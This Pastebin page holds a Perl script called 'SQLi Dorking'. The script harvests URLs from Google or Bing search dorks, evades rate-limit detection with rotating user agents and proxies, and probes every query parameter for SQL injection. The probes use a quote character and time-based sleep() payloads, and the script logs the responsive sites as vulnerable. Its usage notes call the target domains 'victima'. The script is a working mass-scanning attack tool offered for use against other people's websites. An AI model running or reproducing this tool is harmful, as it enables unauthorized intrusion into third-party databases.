Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #################################
- # SQLi Dorking #
- # Autor: Crozz Cyborg #
- # #
- # Copyright 2013 Crozz Cyborg #
- #################################
- use strict;
- $| = 1;
- $SIG{'INT'} = \&Interrupt;
- # Modulos/Librerias
- use HTTP::Request;
- use LWP::UserAgent;
- use Getopt::Long;
- use Benchmark;
- use POSIX;
- use threads;
- use Time::HiRes "usleep";
- # Variables
- my @UserAgents = (
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0',
- 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0',
- 'Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0',
- 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
- 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
- 'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14');
- my ($Dork,$BingDork,$List,$NumPaginas,$FileLinks,$Proxy);
- my $proceso;
- my $result = GetOptions(
- 'gd=s' => \$Dork,
- 'bd=s' => \$BingDork,
- 'l=s' => \$List,
- 'p=s' => \$NumPaginas,
- 'f=s' => \$FileLinks,
- 'prx=s' => \$Proxy);
- # INI Funciones
- sub Uso(){
- die <<EOTXT;
- \rUso: $0 [-d dork] -p <paginas> [-l archivo.txt] [-f archivo]
- -gd <Dork>
- Google Dork
- -bd <Bing>
- Bing Dork
- -l <Archivo>
- Archivo con links para analizar
- -p <paginas>
- Numero de paginas para buscar
- -f <archivo>
- Archivo donde se guardaran los logs
- Ejemplo: $0 -d inurl:product.php?id= -p 3
- Mas informacion escribe: perldoc $0
- EOTXT
- }
- sub LinksByDork(){
- my @Links;
- my $Paginas = $Dork ? 0 : 1;
- my ($carga,$porcentaje) = ("",0);
- $proceso = 'dork';
- print "Dork: $Dork$BingDork\n";
- foreach(my $pag = 0;$pag <= $NumPaginas;$pag++){
- my ($HTML,$Link,@Data);
- printf("\r[%-50s] %3i%%",$carga,$porcentaje < 100 ? ceil($porcentaje) : floor($porcentaje));
- $porcentaje += (100/$NumPaginas);
- $carga = "=" x ($porcentaje < 100 ? ceil($porcentaje)/2 : floor($porcentaje)/2);
- if($Dork){
- $HTML = &Navegar('http://www.google.com/search?q='.$Dork.'&start='.$Paginas,$Proxy);
- }
- elsif($BingDork){
- $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy);
- }
- if($HTML =~ m/Our systems have detected unusual traffic from your computer/i){
- $HTML =~ /IP address\: (\S+)\<br/i;
- print "\rDetectado trafico \"inusual\" de la IP $1\ncambiala para continuar [(C)ambiar a Bing/(Q)uitar/Continuar[Enter]] ";
- chomp(my $CQ = <STDIN>);
- if($CQ =~ /q/i){
- if($#Links > 0){
- @Links = &EliminarRep(@Links);
- return @Links
- }else{exit}
- }
- elsif($CQ =~ /c/i){
- $BingDork = $Dork;
- $Dork = 0;
- $Paginas += 1;
- $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy);
- }
- else{
- print "Continuando...\n";
- $pag--;
- next
- }
- }
- if($Dork){
- @Data = $HTML =~ m/href="\/url\?q=([-.:%?=&\/\w]+)\&sa=U&/gi;
- }
- elsif($BingDork){
- @Data = $HTML =~ /<h3><a href="([-.:%?=&\/\w]+)"/mgi;
- }
- foreach $Link(@Data){
- if($Link !~ m/google.com/i && $Link !~ m/googleusercontent.com/i && $Link !~ m/msn.com/i && ($Link =~ m/\%3[fF]\w+%3[dD]\w+/ || $Link =~ /\?\w+=\w+/)){
- $Link =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- $Link =~ s/https:\/\//http:\/\//g;
- push(@Links,$Link);
- }
- }
- $Paginas += 10;
- }
- print "\n\n";
- @Links = &EliminarRep(@Links);
- return @Links
- }
- sub LinksByList(){
- my @Links;
- $NumPaginas = 15;
- open(LIST,"$List");
- while(<LIST>){
- chomp;
- $BingDork = "site:$_";
- push(@Links,LinksByDork());
- }
- close(LIST);
- return @Links
- }
- sub Navegar(){
- my ($URL,$UseProxy) = @_;
- my ($UA,$Req,$Resp,$Contenido);
- $UA = LWP::UserAgent->new;
- $UA->agent($UserAgents[int(rand($#UserAgents+1))]);
- $UA->timeout(10);
- $URL =~ /^http\:\/\/([\w\.]+)\/*/;
- $UA->default_header('Host' => $1);
- $UA->default_header('Accept' => 'text/html');
- $UA->default_header('Accept-Language' => 'en-US,en;q=0.5');
- $UA->default_header('DNT' => '1');
- $UA->default_header('Connection' => 'close');
- $UA->proxy('http' => "http://$UseProxy") if $UseProxy;
- $Req = HTTP::Request->new(GET => $URL);
- $Resp = $UA->request($Req);
- $Contenido = $Resp->content();
- return $Contenido
- }
- sub SQL(){
- my $Link = shift;
- my @Edit = split('\?',$Link); # Separa variables de la url
- my @Variables = split('&',$Edit[1]); # Separa por pares variable=valor
- my %Vars = map {split('=',$_)} @Variables; # Almacena variable = valor en el hash %Vars
- my $LinkMod;
- my @HTML = (undef) x 3;
- foreach my $Var(keys %Vars){
- $LinkMod = &ModLink($Edit[0],@Variables,$Var," '"); # Se modifica el link para inyectar el codigo ' en la variable $Var
- my $time1 = new Benchmark;
- $HTML[0] = &Navegar($LinkMod);
- my $time2 = new Benchmark;
- my $timeAv = timediff($time2,$time1);
- if($HTML[0] =~ m/You have an error in your SQL syntax/i){
- my @Ret = ($Link,$Var,"'",$$timeAv[0]);
- return \@Ret;
- }
- elsif($HTML[0] =~ m/supplied argument is not a valid MySQL/i){
- my @Ret = ($Link,$Var,"'",$$timeAv[0]);
- return \@Ret;
- }
- return 0 if($$timeAv[0] >= 40);
- $$timeAv[0] = 40 if($$timeAv[0] >= 10);
- foreach(("' and sleep(".($$timeAv[0]+20).") and '1' = '1"," and sleep(".($$timeAv[0]+20).") and 1 = 1")){
- $LinkMod = &ModLink($Edit[0],@Variables,$Var,$_);
- my $time1 = new Benchmark;
- $HTML[0] = &Navegar($LinkMod);
- my $time2 = new Benchmark;
- my $timedif = timediff($time2,$time1);
- if($$timedif[0] >= ($$timeAv[0]+20)){
- my @Ret = ($Link,$Var,$_,$$timedif[0]);
- return \@Ret;
- }
- }
- }
- return 0
- }
- sub ModLink(){
- my $Host = shift;
- my @Variables = shift;
- my $Var = shift;
- my $Code = shift;
- my %Vars = map {split('=',$_)} @Variables;
- my $LinkMod = $Host.'?';
- foreach (keys %Vars){
- if($Var eq $_){$LinkMod .= "$_=".$Vars{$_}." $Code&";}
- else{$LinkMod .= "$_=".$Vars{$_}."&";}
- }
- chop($LinkMod);
- return $LinkMod;
- }
- sub EliminarRep(){
- my @Links = @_;
- my @HP1;
- my @HP2;
- for(my $i = 0;$i <= $#Links;$i++){
- @HP1 = split('\?',$Links[$i]);
- for(my $x = $i;$x <= $#Links;$x++){
- @HP2 = split('\?',$Links[$x]);
- if($i != $x && $HP1[0] eq $HP2[0]){
- splice(@Links,$x,1);
- $x-- if $x != 0;
- }
- }
- }
- return @Links;
- }
- sub Logs(){
- if(open(LOGS,">>${$_[0]}")){
- print LOGS "$_[1]\n";
- close(LOGS);
- }
- else{
- print "No se puede escribir en el archivo '${$_[0]}' $!";
- print "Especifica otro archivo: ";
- chomp(${$_[0]} = <STDIN>);
- }
- }
- sub Interrupt(){
- print "\n\n1) Cambiar proxy\n2) Cambiar dork\n3) Salir\n\n\$> ";
- chomp(my $resp = <STDIN>);
- if($resp == 1){print "Nuevo proxy: ";chomp($Proxy = <STDIN>)}
- elsif($resp == 2){print "Nueva dork: ";chomp($Dork = <STDIN>)}
- elsif($resp == 3){print "Finalizando\n";exit}
- else{print "Opcion invalida\n";}
- }
- # End Funciones
- sub main(){
- my @Links;
- my @LinkSQLi;
- my @t = (4,8,10);
- my @c = ("\e[1;32m","\e[0;32m");
- my $nc = 0;
- print "Obteniendo links...";
- if($Dork){
- Uso() unless $NumPaginas;
- if($BingDork){
- print "\rSolamente puedes usar un buscador!\n";
- Uso();
- }
- print "\n";push(@Links,LinksByDork());
- }
- elsif($BingDork){
- Uso() unless $NumPaginas;
- if($Dork){
- print "\rSolamente puedes usar un buscador!\n";
- Uso();
- }
- print "\n";push(@Links,LinksByDork());
- }
- elsif($List){
- print "\n";push(@Links,LinksByList());
- }
- else{
- Uso();
- }
- print "Escaneando ".($#Links+1)." links...\n\n" if $#Links > 0;
- foreach(@Links){
- my $thr1 = threads->create(\&SQL,$_);
- while($thr1->is_running()){
- for(("/","-","\\","|")){
- print $_;
- usleep(80_000);
- print "\b";
- }
- }
- my $Datos = $thr1->join();
- if($Datos){
- foreach(0..2){
- $t[$_] = length($$Datos[$_]) if($t[$_] < length($$Datos[$_]));
- }
- printf("Link: %s Var: %s Payload: %s Time: %s\n",$$Datos[0],$$Datos[1],$$Datos[2],$$Datos[3]);
- &Logs(\$FileLinks,"Link: $$Datos[0] Var: $$Datos[1] Payload: $$Datos[2]") if $FileLinks;
- push(@LinkSQLi,$Datos);
- }
- }
- if(@LinkSQLi){
- printf("\n" x 5);
- printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2]));
- printf("|\e[0;33mLink%s\e[0m|\e[0;33mVar%s\e[0m|\e[0;33mPayload%s\e[0m|\n"," " x ($t[0]-4)," " x ($t[1]-3)," " x ($t[2]-7));
- printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2]));
- foreach my $l(@LinkSQLi){
- printf("|$c[$nc % 2]%-${t[0]}s\e[0m|$c[$nc % 2]%-${t[1]}s\e[0m|$c[$nc % 2]%-${t[2]}s\e[0m|\n",$$l[0],$$l[1],$$l[2]);
- $nc++;
- }
- printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2]));
- system("notify-send \"SQLi Dorking\" \"Escaneo finalizado con ".($#LinkSQLi+1)." vulnerables\" -t 10000");
- }
- else{
- print "No se encontraron paginas vulnerables\n";
- }
- }
- main();
- __END__
- =head1 Nombre
- SQLi Dorking
- =head1 Version
- Version: 1.0 Beta
- =head1 Autor
- Crozz Cyborg
- =head1 Descripcion
- Busca paginas vulnerables a SQL (usa google)
- =head1 Uso
- sqliDorking.pl [-d/-bd <dork>] -p <paginas> [-l Links.txt] [-f Logs.txt]
- =head2 Opciones
- -gd <Dork>
- Google Dork
- -bd <Bing>
- Bing Dork
- -l <Archivo>
- Archivo con links para analizar
- -p <paginas>
- Numero de paginas para buscar
- -f <archivo>
- Archivo donde se guardaran los logs
- =head2 Ejemplos de uso
- sqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txt
- sqliDorking.pl -l links.txt -f VulneSQL.txt
- sqliDorking.pl -bd inurl:product.php?id= -p 3
- sqliDorking.pl -l links.txt
- =head2 Archivo Links.txt
- El archivo links.txt puede tener cualquier otro nombre, en cuanto al formato debe de tener 1 nombre de dominio por linea, ejemplo de dominio: victima.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement